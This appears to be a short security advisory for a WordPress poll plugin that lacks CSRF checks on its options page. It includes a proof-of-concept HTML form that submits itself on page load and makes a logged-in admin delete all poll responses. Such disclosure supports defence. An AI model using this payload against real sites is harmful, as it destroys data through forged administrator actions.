Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks
Make a logged in admin open the following:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=nps-plugin-options" method="POST">
<input type="text" id="event" name="event" value='delete_all'>
<input type="submit" value="submit" name="add">
</form>
</body>
```
The result is that all existing poll responses are deleted.